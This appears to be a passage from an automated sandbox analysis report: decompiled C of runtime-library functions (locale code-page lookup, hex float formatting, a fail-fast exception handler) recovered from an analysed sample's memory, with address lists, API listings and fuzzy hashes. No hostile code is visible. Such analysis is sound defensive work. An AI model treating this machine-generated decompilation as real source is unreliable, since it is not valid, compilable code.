				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E0041B4E1(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x0042b87e
0x0042b885
0x0042b929
0x0042b942
0x0042b948
0x0042b94d
0x0042b94f
0x0042b94f
0x0042b955
0x0042b958
0x0042b958
0x0042b944
0x0042b944
0x00000000
0x0042b944
0x0042b88b
0x0042b890
0x00000000
0x00000000
0x0042b896
0x0042b89b
0x0042b89d
0x0042b89d
0x0042b8a3
0x00000000
0x00000000
0x0042b8a8
0x0042b8bf
0x0042b8bf
0x0042b8c8
0x0042b8ca
0x00000000
0x00000000
0x0042b8cc
0x0042b8d1
0x0042b8d3
0x0042b8d3
0x0042b8d9
0x00000000
0x00000000
0x0042b8de
0x0042b8fc
0x0042b8fe
0x0042b921
0x00000000
0x0042b926
0x0042b919
0x00000000
0x00000000
0x0042b91b
0x00000000
0x0042b91b
0x0042b8e0
0x0042b8e8
0x00000000
0x00000000
0x0042b8ea
0x0042b8ed
0x0042b8f3
0x00000000
0x00000000
0x00000000
0x0042b8f5
0x0042b8f7
0x0042b8f9
0x00000000
0x0042b8f9
0x0042b8aa
0x0042b8b2
0x00000000
0x00000000
0x0042b8b4
0x0042b8b7
0x0042b8bd
0x00000000
0x00000000
0x00000000
0x0042b8bd
0x0042b8c3
0x0042b8c5
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0042BB96,00000002,00000000,?,?,?,0042BB96,?,00000000), ref: 0042B911
GetLocaleInfoW.KERNEL32(?,20001004,0042BB96,00000002,00000000,?,?,?,0042BB96,?,00000000), ref: 0042B93A
GetACP.KERNEL32(?,?,0042BB96,?,00000000), ref: 0042B94F

Strings

ACP, xrefs: 0042B896
OCP, xrefs: 0042B8CC

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: baa951752c453f5e08ee5dfd05715e70370394d7da1a31da91ae6347c7eddb80
Instruction ID: 587694517562672ddcb390d6997b9a768a075160a8bfa1f5444cbfb0e68a1466
Opcode Fuzzy Hash: baa951752c453f5e08ee5dfd05715e70370394d7da1a31da91ae6347c7eddb80
Instruction Fuzzy Hash: C821B872B00121A6DB349F55E900BA773AAEF54B50BD6C026EA09D7301EB36DE81C3DC

Uniqueness

Uniqueness Score: -1.00%

Function 00421F48 Relevance: 6.3, APIs: 4, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00421F48(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t87;
				void* _t93;
				intOrPtr _t94;
				signed int _t98;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				signed int _t106;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t115;
				void* _t118;
				void* _t120;
				void* _t122;
				signed int* _t124;
				void* _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int* _t140;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				void* _t161;
				unsigned int _t162;
				intOrPtr _t171;
				signed int _t173;
				signed int* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				intOrPtr _t189;
				void* _t190;

				_t186 = _a24;
				if(_t186 < 0) {
					_t186 = 0;
				}
				_t183 = _a8;
				_t3 = _t186 + 0xb; // 0xb
				 *_t183 = 0;
				if(_a12 > _t3) {
					_t140 = _a4;
					_t147 = _t140[1];
					_t173 =  *_t140;
					__eflags = (_t147 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if(__eflags != 0) {
						__eflags = _t147;
						if(__eflags > 0) {
							L13:
							_t20 = _t183 + 1; // 0x2
							_t174 = _t20;
							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t28 =  &(_t174[0]); // 0x2
								_t184 = _t28;
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E0041A250(_t94, _t174, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E00431060( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E00422779(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E00415180(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E00431060( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t70 = _t184 + 2; // 0x2
										_t177 = _t70;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E00430F60();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E00430F60();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t185 = _t177 + 1;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E00430F60();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E00422274(_t140, _t147, _t173, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E00431110(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E00417FD2(_t183, _t189, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}

0x00421f53
0x00421f59
0x00421f5b
0x00421f5b
0x00421f5d
0x00421f60
0x00421f63
0x00421f68
0x00421f8d
0x00421f90
0x00421f95
0x00421f9f
0x00421fa4
0x00421ffd
0x00421fff
0x0042200e
0x00422011
0x00422011
0x00422014
0x00422016
0x0042201d
0x0042202f
0x00422032
0x00422037
0x0042203b
0x0042203c
0x0042205c
0x0042205f
0x0042205f
0x0042205f
0x00422061
0x00422061
0x00422061
0x00422064
0x00422066
0x0042206c
0x0042206f
0x00422073
0x00422077
0x0042207c
0x0042207f
0x0042207f
0x00422085
0x00422085
0x0042208f
0x00422068
0x00422068
0x00422068
0x00422091
0x00422096
0x00422096
0x0042209b
0x0042209e
0x004220a8
0x004220aa
0x004220ac
0x004220b1
0x004220b2
0x004220b5
0x004220b8
0x004220bb
0x004220c1
0x004220c4
0x004220c6
0x004220c9
0x004220cc
0x004220ce
0x00000000
0x00000000
0x004220e5
0x004220ec
0x004220f0
0x004220f3
0x004220f6
0x004220f8
0x004220f8
0x004220f8
0x004220fe
0x00422101
0x00422105
0x00422107
0x0042210b
0x0042210e
0x00422111
0x00422112
0x00422115
0x00422118
0x0042211b
0x0042211e
0x00000000
0x00422120
0x00000000
0x00422120
0x0042211e
0x00422125
0x00422128
0x00422130
0x00422135
0x00422138
0x0042213a
0x00000000
0x00000000
0x0042213c
0x00422141
0x00422142
0x00422145
0x00422145
0x00422147
0x0042214a
0x00000000
0x00000000
0x0042214c
0x0042214f
0x00422156
0x00422159
0x0042215c
0x00422171
0x00422171
0x00422171
0x0042215e
0x0042215e
0x00422161
0x0042216b
0x0042216b
0x00422163
0x00422166
0x00422166
0x0042216d
0x0042216d
0x00000000
0x0042215c
0x00422151
0x00422151
0x00422153
0x00422153
0x004220a0
0x004220a0
0x004220a2
0x00422174
0x00422174
0x00422176
0x00422178
0x0042217b
0x0042217c
0x0042217d
0x0042217e
0x00422186
0x00422186
0x00422186
0x00422188
0x0042218b
0x0042218e
0x00422190
0x00422190
0x0042219c
0x004221a0
0x004221a3
0x004221a8
0x004221b4
0x004221b6
0x004221b6
0x004221b9
0x004221b9
0x004221bc
0x004221bf
0x004221c1
0x004221cd
0x004221cd
0x004221d1
0x004221d3
0x004221d5
0x00000000
0x004221c3
0x004221c3
0x004221c9
0x004221d6
0x004221d6
0x004221d9
0x004221dd
0x004221de
0x004221e0
0x004221e2
0x0042223e
0x00422240
0x00422241
0x00422241
0x00422243
0x00422266
0x00422266
0x00422266
0x00422268
0x0042226a
0x0042226d
0x0042226d
0x0042226d
0x0042226f
0x00000000
0x0042226f
0x00422245
0x0042224c
0x0042224c
0x0042224d
0x0042224e
0x00422250
0x00422251
0x00422252
0x0042225b
0x0042225e
0x00422261
0x00422263
0x00422264
0x00422264
0x00000000
0x00422264
0x00422247
0x0042224a
0x00000000
0x00000000
0x00000000
0x0042224a
0x004221e9
0x004221ef
0x004221ef
0x004221f0
0x004221f1
0x004221f2
0x004221f3
0x004221f4
0x004221f9
0x004221fd
0x00422202
0x00422205
0x00422207
0x0042220a
0x0042220c
0x0042220e
0x0042221b
0x0042221b
0x0042221c
0x0042221d
0x0042221f
0x00422220
0x00422221
0x00422226
0x0042222c
0x0042222f
0x00422231
0x00422234
0x00422236
0x00422237
0x0042223a
0x00000000
0x00000000
0x00000000
0x0042223c
0x00422210
0x00422210
0x00422212
0x00000000
0x00000000
0x00422214
0x00000000
0x00000000
0x00422216
0x00422219
0x00000000
0x00000000
0x00000000
0x00422219
0x004221eb
0x004221ed
0x00000000
0x00000000
0x00000000
0x004221ed
0x004221c5
0x004221c7
0x00000000
0x00000000
0x00000000
0x004221c7
0x004221c1
0x00000000
0x004220a2
0x0042209e
0x0042203e
0x0042204a
0x0042204a
0x0042204c
0x00422053
0x00000000
0x00422053
0x0042204e
0x00000000
0x0042204e
0x00422001
0x00422007
0x00422007
0x0042200a
0x0042200a
0x0042200b
0x00000000
0x0042200b
0x00422003
0x00422005
0x00000000
0x00000000
0x00000000
0x00422005
0x00421fbe
0x00421fc6
0x00421fc8
0x00421fd5
0x00421fdc
0x00421fde
0x00421ff0
0x00421ff2
0x00421ff2
0x00000000
0x00421fde
0x00421fca
0x00000000
0x00421fca
0x00421f6a
0x00421f6f
0x00421f76
0x00421f7a
0x00421f7d
0x00000000

APIs

_strrchr.LIBCMT ref: 00421FD5

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 57f558dd77f97a6df339e016eee450913f8246513639b0d959086a0c6df0ca26
Instruction ID: aaad6e97ca1db1231b3823d89b98c34407925629691d7612207573c5b9e4082b
Opcode Fuzzy Hash: 57f558dd77f97a6df339e016eee450913f8246513639b0d959086a0c6df0ca26
Instruction Fuzzy Hash: ABB18A32B04265AFDB158F28D981BFFBBA5EF59304F5441ABE900AB341C2BD9D01C769

Uniqueness

Uniqueness Score: -1.00%

Function 00413DCA Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00413DCA(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00413F8E(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00415180(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00415180(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00413F8E(_t49);
				}
				return _t49;
			}

0x00413dca
0x00413dca
0x00413dca
0x00413dde
0x00413de0
0x00413de3
0x00413de3
0x00413de7
0x00413dec
0x00413e04
0x00413e0a
0x00413e10
0x00413e16
0x00413e1c
0x00413e22
0x00413e28
0x00413e2f
0x00413e36
0x00413e3d
0x00413e44
0x00413e4b
0x00413e52
0x00413e53
0x00413e5c
0x00413e62
0x00413e65
0x00413e6b
0x00413e7a
0x00413e86
0x00413e91
0x00413e98
0x00413e9f
0x00413eaa
0x00413eb2
0x00413ebb
0x00413ebd
0x00413ec0
0x00413ec2
0x00413ecc
0x00413ed4
0x00413eda
0x00000000
0x00413ee1
0x00413ee4

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413DD6
IsDebuggerPresent.KERNEL32 ref: 00413EA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413EC2
UnhandledExceptionFilter.KERNEL32(?), ref: 00413ECC

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e14b2efa5fe5e5553fbb2ee573e50a86ee26a3403d6dd35079497cbd310cf862
Instruction ID: c12cfa2384cc08bf4641669c42ca0e7150b6ce3d5bd31e29dfbc754d7b5ffc75
Opcode Fuzzy Hash: e14b2efa5fe5e5553fbb2ee573e50a86ee26a3403d6dd35079497cbd310cf862
Instruction Fuzzy Hash: 13312775D41318EBDB21DFA1D9897CDBBB8AF08305F1041AAE40CAB250EB759B848F49

Uniqueness

Uniqueness Score: -1.00%

Function 0042B4FC Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042B4FC(void* __ecx, signed char __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				intOrPtr _t80;
				void* _t89;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t140;

				_t121 = __edx;
				_t50 =  *0x443048; // 0x35200185
				_v8 = _t50 ^ _t127;
				_t125 = _a4;
				_t94 = E00420590(__ecx, __edx, _a4);
				_t124 =  *(E00420590(__ecx, __edx, _a4) + 0x34c);
				_t126 = E0042B824(_t125);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					L38:
					return E0041361E(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
							_push(_t124);
							_t94 = 0;
							if(E0042B97E(_t126, 0) == 0) {
								goto L36;
							}
							 *_t124 =  *_t124 | 0x00000100;
							L34:
							if(_t140 == 0) {
								_t124[1] = _t126;
							}
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						if(E0042B97E(_t126, 1) == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t140 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E00427E64(_t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
						L12:
						_t121 =  *_t124;
						if((_t121 & 0x00000001) != 0 || E0042B959(_t126) == 0) {
							goto L16;
						} else {
							 *_t124 = _t121;
							goto L15;
						}
					}
					_t92 = E0042DE7A(_t94, _t124, _t126,  *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
					_t128 = _t128 + 0xc;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
					} while (_t93 != _v252);
					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x0042b4fc
0x0042b507
0x0042b50e
0x0042b513
0x0042b51c
0x0042b524
0x0042b533
0x0042b53f
0x0042b550
0x0042b556
0x0042b55f
0x0042b739
0x0042b73b
0x0042b73d
0x0042b73e
0x0042b74c
0x0042b74c
0x0042b578
0x0042b633
0x0042b63e
0x0042b72d
0x0042b734
0x00000000
0x0042b734
0x0042b652
0x0042b668
0x00000000
0x00000000
0x0042b678
0x0042b681
0x0042b6f2
0x0042b70e
0x0042b70f
0x0042b71d
0x00000000
0x00000000
0x0042b71f
0x0042b728
0x0042b728
0x0042b72a
0x0042b72a
0x0042b728
0x00000000
0x0042b6f2
0x0042b685
0x0042b68b
0x0042b690
0x0042b6a5
0x00000000
0x00000000
0x0042b6a7
0x0042b6ad
0x0042b6b3
0x0042b6b3
0x0042b6b6
0x0042b6b9
0x0042b6c8
0x0042b6cd
0x0042b6e9
0x00000000
0x0042b6e9
0x0042b6cf
0x0042b6dd
0x00000000
0x00000000
0x0042b6df
0x0042b6e5
0x0042b69a
0x0042b69a
0x00000000
0x0042b69a
0x0042b692
0x0042b698
0x00000000
0x0042b698
0x0042b58c
0x0042b5a2
0x00000000
0x00000000
0x0042b5b2
0x0042b5b9
0x0042b5bd
0x0042b5cf
0x00000000
0x00000000
0x0042b5d5
0x0042b619
0x0042b619
0x0042b61e
0x00000000
0x0042b62b
0x0042b62e
0x00000000
0x0042b62e
0x0042b61e
0x0042b5e4
0x0042b5e9
0x0042b5ee
0x00000000
0x00000000
0x0042b5f0
0x0042b5f3
0x0042b5f6
0x0042b5f9
0x0042b5fc
0x0042b5fc
0x0042b5ff
0x0042b602
0x0042b612
0x0042b614
0x0042b614
0x0042b5bf
0x0042b5c5
0x0042b5c8
0x0042b630
0x0042b630
0x0042b630

APIs

Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B550
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B59A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042B660

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 1fcac98c11902b44eaa6d513564f9c607318998a38525dea3ce738314f36f839
Instruction ID: 2bd5c721c5fcb94935e4f6be14f52691898d4700b66d850c1932820e951b2741
Opcode Fuzzy Hash: 1fcac98c11902b44eaa6d513564f9c607318998a38525dea3ce738314f36f839
Instruction Fuzzy Hash: 1F6195716102279FDB289F25EC82BB7B3A8EF44704F5440BBE905C6285E738DD81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00417E53 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00417E53(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
